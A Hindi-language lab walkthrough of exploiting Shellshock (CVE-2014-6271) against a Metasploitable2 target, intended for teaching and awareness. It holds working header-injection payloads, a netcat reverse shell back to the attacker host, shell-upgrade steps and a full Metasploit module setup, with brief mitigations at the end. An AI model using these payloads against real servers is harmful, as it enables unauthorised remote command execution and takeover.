CVE-2014-6271 (Shellshock) के लिए एक पूर्ण, आधुनिक प्रदर्शन लैब, जिसमें आर्किटेक्चर, शोषण चरण, Burp Suite उपयोग, रिवर्स शेल, प्रतिवाद और पूर्ण कमांड चीट-शीट शामिल हैं।
शेलशॉक (CVE-2014-6271) अब तक खोजी गई सबसे प्रभावशाली रिमोट कोड निष्पादन कमजोरियों में से एक है। यह दोष Bash को प्रभावित करता है और हमलावरों को पर्यावरण चरों में तैयार पेलोड इंजेक्ट करके मनमाने आदेशों को निष्पादित करने की अनुमति देता है।
यह मार्गदर्शिका निम्नलिखित का उपयोग करके एक पूर्ण, प्रतिलिपि प्रस्तुत करने योग्य प्रदर्शन प्रदान करती है:
यह शिक्षण, अनुसंधान, प्रशिक्षण और सामान्य साइबर सुरक्षा जागरूकता के लिए डिज़ाइन किया गया है।
| घटक | भूमिका | OS | आईपी पता | मुख्य सेवाएँ |
|---|---|---|---|---|
| काली लिनक्स | हमलावर | Kali Linux (नवीनतम) | 192.168.1.4 | curl, Burp Suite, Netcat |
| मेटास्प्लोइटेबल2 | लक्ष्य संवेदनशील सर्वर | Ubuntu Linux (MSF2) | 192.168.1.5 | Apache 2.2, CGI स्क्रिप्ट्स, Bash |
| Apache mod_cgi | स्क्रिप्ट निष्पादन | MSF2 पर चलता है | n/a | CGI के माध्यम से Bash को उजागर करता है |
| shellshock.sh | संवेदनशील प्रवेश बिंदु | Bash CGI | n/a | पर्यावरण चर प्रदर्शित करता है |
यह सरल दो-नोड सेटअप औद्योगिक और IoT सिस्टम में अभी भी मौजूद कई विरासत परिनियोजनों को दर्शाता है।
Metasploitable2 पर:
sudo su
cd /usr/lib/cgi-bin/
cat << 'EOF' > shellshock.sh
#!/bin/bash
echo "Content-type: text/html"
echo
echo "<pre>"
env
echo "</pre>"
EOF
chmod +x shellshock.sh
a2enmod cgi
service apache2 restart
Kali से स्क्रिप्ट का परीक्षण करें:
curl http://192.168.1.5/cgi-bin/shellshock.sh
आपको पर्यावरण चर प्रदर्शित होते हुए देखना चाहिए।
शेलशॉक तब होता है जब Bash फ़ंक्शन परिभाषाओं से मिलते-जुलते पर्यावरण चरों का गलत तरीके से पार्स करता है।
एक दुर्भावनापूर्ण चर जैसे:
() { :; }; /bin/bash -c "id"
Bash को फ़ंक्शन परिभाषा के बाद कमांड निष्पादित करने का कारण बनेगा—भले ही फ़ंक्शन स्वयं कभी आह्वान न किया गया हो।
CGI अनुप्रयोग विशेष रूप से संवेदनशील होते हैं क्योंकि HTTP हेडर स्वचालित रूप से पर्यावरण चर के रूप में स्क्रिप्ट को पास हो जाते हैं।
curl -H 'User-Agent: () { :; }; echo; echo Vulnerable; /bin/bash -c "id"' \
http://192.168.1.5/cgi-bin/shellshock.sh
आउटपुट में शामिल होना चाहिए:
Vulnerable
uid=33(www-data)
यह रिमोट कोड निष्पादन की पुष्टि करता है।
यहाँ जाएँ:
http://192.168.1.5/cgi-bin/shellshock.sh
अनुरोध को Repeater पर भेजें।
User-Agent हेडर को इससे बदलें:
User-Agent: () { :; }; echo; echo BurpTest; /bin/bash -c "id"
आपको देखना चाहिए:
BurpTest
uid=33(www-data)
Burp Suite दृश्य और शैक्षिक तरीके से कमजोरी की पुष्टि करता है।
Kali पर सुनने वाला प्रारंभ करें:
nc -lvnp 4444
CGI स्क्रिप्ट के माध्यम से रिवर्स शेल ट्रिगर करें:
curl -H 'User-Agent: () { :; }; /bin/bash -c "nc 192.168.1.4 4444 -e /bin/bash"' \
http://192.168.1.5/cgi-bin/shellshock.sh
Kali को एक शेल वापस जुड़ जाएगा।
रिवर्स शेल के अंदर:
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
सत्र को निलंबित करें:
Ctrl + Z
Kali पर:
stty raw -echo; fg
Enter दबाएँ।
अब आपके पास है:
┌────────────────────────┐
│ हमलावर (काली) │
│ 192.168.1.4 │
└───────────┬────────────┘
│
1. दुर्भावनापूर्ण HTTP हेडर (शेलशॉक)
│
▼
┌──────────────────────────┐
│ Apache वेब सर्वर (CGI) │
│ 192.168.1.5 │
└───────────┬──────────────┘
│
2. हेडर → CGI पर्यावरण चर
│
▼
┌──────────────────────────┐
│ Bash (संवेदनशील) │
└───────────┬──────────────┘
│
3. इंजेक्टेड कमांड निष्पादित होता है
│
▼
┌─────────────────────────┐
│ www-data शेल एक्सेस │
└───────────┬─────────────┘
│
4. रिवर्स शेल → काली
│
▼
┌──────────────────────────┐
│ पूर्ण इंटरैक्टिव TTY │
└──────────────────────────┘
हमले के प्रमुख चरणों का एक दृश्य वॉकथ्रू।
| विवरण | छवि |
|---|---|
| Nmap स्कैन + Shellshock परीक्षण आउटपुट | ![]() |
| Burp Suite – प्रारंभिक Shellshock अनुरोध | ![]() |
| Burp Suite – पेलोड / हेडर इंजेक्शन | ![]() |
| Kali पर प्राप्त रिवर्स शेल (nc) | ![]() |
उस संस्करण पर पैच लागू करें जो फ़ंक्शन पार्सिंग को सही ढंग से संभालता है।
विरासत CGI अनावश्यक प्रणालीगत जोखिम का परिचय देता है।
संदिग्ध पैटर्न जैसे कि:
() { :; };
को हटाएँ।
वेब सर्वर उपयोगकर्ता (www-data) की अनुमतियों को प्रतिबंधित करें।
रिवर्स शेल और डेटा निष्कासन को रोकता है।
आधुनिक WAF हस्ताक्षर शेलशॉक का तुरंत पता लगाते हैं।
Bash प्रक्रियाओं को सीमित करता है और अनावश्यक व्यवहार को अवरुद्ध करता है।
निम्नलिखित टूल का उपयोग करें:
http-shellshock.nse)sudo su
cd /usr/lib/cgi-bin/
cat << 'EOF' > shellshock.sh
#!/bin/bash
echo "Content-type: text/html"
echo
echo "<pre>"
env
echo "</pre>"
EOF
chmod +x shellshock.sh
a2enmod cgi
service apache2 restart
curl http://192.168.1.5/cgi-bin/shellshock.sh
curl -H 'User-Agent: () { :; }; echo; echo Vulnerable; /bin/bash -c "id"' \
http://192.168.1.5/cgi-bin/shellshock.sh
nc -lvnp 4444
curl -H 'User-Agent: () { :; }; /bin/bash -c "nc 192.168.1.4 4444 -e /bin/bash"' \
http://192.168.1.5/cgi-bin/shellshock.sh
शेल के अंदर:
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
निलंबित करें:
Ctrl + Z
Kali पर:
stty raw -echo; fg
Enter दबाएँ।
Metasploit अंतर्निहित मॉड्यूल का उपयोग करके शेलशॉक का शोषण करने का एक पेशेवर, स्वचालित तरीका प्रदान करता है:
exploit/multi/http/apache_mod_cgi_bash_env_exec
यह विधि तेज़, विश्वसनीय है और स्वचालित पेलोड स्टेजिंग (जैसे, Meterpreter) प्रदान करती है।
msfconsole
search shellshock
आपको (अन्य के साथ) देखना चाहिए:
exploit/multi/http/apache_mod_cgi_bash_env_exec Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
auxiliary/scanner/http/apache_mod_cgi_bash_env Apache mod_cgi Bash Environment Variable Injection (Scanner)
use exploit/multi/http/apache_mod_cgi_bash_env_exec
लक्ष्य IP सेट करें:
set rhosts 192.168.1.5
संवेदनशील CGI पथ सेट करें:
set targeturi /cgi-bin/shellshock.sh
अपना Kali IP सेट करें:
set lhost 192.168.1.4
वैकल्पिक रूप से सुनने का पोर्ट सेट करें:
set lport 4444
सत्यापित करें:
options
आपको देखना चाहिए:
RHOSTS 192.168.1.5
TARGETURI /cgi-bin/shellshock.sh
LHOST 192.168.1.4
LPORT 4444
METHOD GET
HEADER User-Agent
CVE CVE-2014-6271
run
सफलता पर:
[*] Started reverse TCP handler on 192.168.1.4:4444
[*] Command Stager progress - 100.00%
[*] Sending stage ...
[*] Meterpreter session 1 opened ...
sessions -i 1
अब आपके पास है:
meterpreter >
shell
फिर:
id
hostname
अपेक्षित:
uid=33(www-data) gid=33(www-data)
metasploitable
आपने Metasploit और Shellshock का उपयोग करके रिमोट कमांड निष्पादन प्राप्त किया है।
यह प्रदर्शन दर्शाता है कि कैसे शेलशॉक का शोषण सरल HTTP हेडर हेरफेर, रिवर्स शेल, CGI स्क्रिप्ट निष्पादन और Metasploit ऑटोमेशन का उपयोग करके किया जा सकता है। एक दशक से अधिक पुराना होने के बावजूद, शेलशॉक इनमें एक महत्वपूर्ण सबक बना हुआ है:
बहुत प्यार से बनाया गया:
Haitham of Oman ❤️🇴🇲